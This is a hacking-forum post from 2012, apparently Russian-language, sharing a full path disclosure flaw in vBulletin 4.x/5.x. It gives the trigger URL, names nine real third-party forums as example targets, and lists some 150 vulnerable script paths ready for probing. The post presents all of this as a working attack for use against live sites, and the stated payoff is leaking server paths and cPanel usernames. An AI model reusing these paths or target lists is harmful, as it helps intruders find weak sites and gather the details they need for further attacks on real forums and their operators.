17.12.2012, 02:13
|
|
Новичок
Регистрация: 19.02.2010
Сообщений: 1
Провел на форуме:
12389
Репутация:
6
|
|
vBulletin 4.2.0 Full Path Disclosure Vulnerability
Код:
Code:
The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.
To see it go to: http://[path]/forumrunner/include/album.php
It works in 90% of the forums.
Example:
http://www.mgcproducts.com/forumrunner/include/album.php http://atheistdiscussion.com/forumrunner/include/album.php http://apolyton.net/forumrunner/include/album.php http://www.romaniancommunity.net/forumrunner/include/album.php http://www.ghosthax.com/forumrunner/include/album.php http://www.reddotcity.net/forumrunner/include/album.php http://www.sevenskins.com/forum/forumrunner/include/album.php http://www.purevb.com/forumrunner/include/album.php http://forum.hackersbrasil.com.br/forumrunner/include/album.php
vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln
Код:
Code:
/includes/api/commonwhitelist_2.php
/includes/api/commonwhitelist_5.php
/includes/api/commonwhitelist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subscription_entrylist.php
/includes/api/1/blog_subscription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subscription_addsubscription.php
/includes/api/1/subscription_editfolders.php
/includes/api/1/subscription_viewsubscription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subscription_entrylist.php
/includes/api/2/blog_subscription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subscription_viewsubscription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subscriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php
//...Leaked bY beBoss..// |
|
|